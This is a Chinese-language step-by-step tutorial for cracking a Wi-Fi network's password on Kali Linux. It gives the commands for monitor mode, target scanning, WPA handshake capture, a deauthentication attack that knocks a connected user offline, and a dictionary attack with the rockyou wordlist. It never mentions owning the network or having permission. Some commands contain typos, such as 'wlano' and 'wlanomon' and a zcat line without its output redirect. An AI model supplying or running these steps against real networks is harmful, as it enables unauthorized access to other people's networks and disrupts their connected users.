本次教程是在kali linux系统下，使用kali自带的airmon-ng 、 airodump-ng 、 aircrack-ng 命令破解Wi-Fi（可能还需aireplay-ng），先拿到握手包，再用握手包跑密码字典，得到最终wifi密码。

开始前准备：

　　1. kali系统

　　2. kali支持的无线网卡：推荐RT3070 和 RT8187

　　3. 密码字典（kali系统已自带一个密码字典）

详细步骤：

一、插入网卡并开启监听模式：

开启监听模式命令：

airmon-ng start wlano

 输入 iwconfig 命令后，wlan0变为wlan0mon即开启了监听模式。

二、扫描网络，找到要破解的Wi-Fi的MAC地址、信道等信息：

airodump-ng wlan0mon

这里如果一直扫描不到网络，可能有以下几点情况：

　　1. 输入如下命令重启monitor

ifconfig wlan0mon down

iwconfig wlan0mon mode monitor

ifconfig wlan0mon up

airodump-ng wlan0mon

　　2. 开启监听时有报错，针对报错百度或者谷歌寻找答案解决。

　　3. 无线网卡是坏的

 三、针对要破解的WI-FI开启监听，并获取到握手包：

airodump-ng -c [信道CH值] --bssid [MAC地址BSSID值] -w [存储握手包路径/握手包等文件名称] wlan0mon

四、当有新用户连接此Wi-Fi时，就能获取握手包，页面会出现handshake信息，如下：

 如果迟迟不能获取到握手包，可以对Wi-Fi进行攻击，让一个用户下线，其重新上线后即可获取到握手包，

aireplay-ng -0 [攻击次数] -a [wifi MAC地址] -c [客户端MAC地址] wlanomon

五、用握手包跑密码字典，得到Wi-Fi密码:

aircrack-ng -w [密码字典路径] [握手包路径]

 这里用的是kali自带的密码字典，新装的kali系统密码字典可能是一个压缩包gz文件，需要将其解压为rockyou.txt文件

zcat [rockyou.txt.gz文件路径] [输出密码字典文件路径]

 等待破解完成即可，密码越简单破解越快，理论只要字典内容够多，Wi-Fi密码都能破解，破解完成会出现 KEY FOUND！ 字样，其后面中括号里面的就是Wi-Fi密码